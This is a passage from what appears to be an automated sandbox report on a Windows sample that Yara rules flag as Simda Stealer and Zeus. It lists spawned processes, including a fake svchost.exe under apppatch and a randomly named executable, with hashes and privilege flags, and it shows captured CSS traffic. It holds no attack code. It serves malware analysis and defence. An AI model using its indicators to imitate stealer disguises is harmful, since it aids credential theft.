                                                                                                                                                                                                          Data Ascii: important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:0
                                                                                                                                                                                                          2024-11-11 17:26:03 UTC1369INData Raw: 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d
                                                                                                                                                                                                          Data Ascii: amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-elem
                                                                                                                                                                                                          2024-11-11 17:26:03 UTC1369INData Raw: 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b
                                                                                                                                                                                                          Data Ascii: ortant;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!important;
                                                                                                                                                                                                          2024-11-11 17:26:03 UTC1369INData Raw: 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73 70 6c 61
                                                                                                                                                                                                          Data Ascii: mportant;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accordion{displa


                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:12:24:00
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Users\user\Desktop\WlCVLbzNph.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\WlCVLbzNph.exe"
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:210'432 bytes
                                                                                                                                                                                                          MD5 hash:BB4D08026F4DAD460862BE3D65FBEDDB
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                          Start time:12:24:01
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Windows\apppatch\svchost.exe"
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:210'432 bytes
                                                                                                                                                                                                          MD5 hash:7F7F85F214F3A6B27A5B5FF8F6EC6188
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1991774796.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1985170745.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1980433347.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1985005669.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1964558264.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2692265840.0000000002CD1000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1869468125.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1995640935.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1948235173.0000000005830000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1964024407.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1980207397.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1963250031.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1992856341.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1815491557.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1994050836.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1458207873.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1907200563.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1984832465.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1810656396.0000000004200000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2000637798.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1991348286.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1823534171.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1882456143.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1962925986.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1995104325.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1963615191.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1899640794.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2011646276.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.1455512249.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1455512249.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1992107371.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1980820181.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1964296820.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2000260170.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1963816092.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1953762470.000000000ED00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1984425254.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1930720915.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1962281793.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2691342691.00000000029F3000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1960879139.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2017537084.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2691342691.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1984646788.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1992581990.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1873423952.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1841520196.000000000F340000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1994473881.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1964748612.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.1455296736.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1455296736.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1981345088.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2017774117.000000000F280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                          Start time:12:24:37
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1935549687.0000000001200000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1937317769.0000000001410000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                          Start time:12:24:38
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1936970508.0000000001320000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1937351360.0000000001380000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                          Start time:12:24:38
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 764
                                                                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                          Start time:12:24:38
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000A.00000002.1940866370.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000A.00000002.1943305461.0000000003210000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                          Start time:12:24:39
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 716
                                                                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                          Start time:12:24:39
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
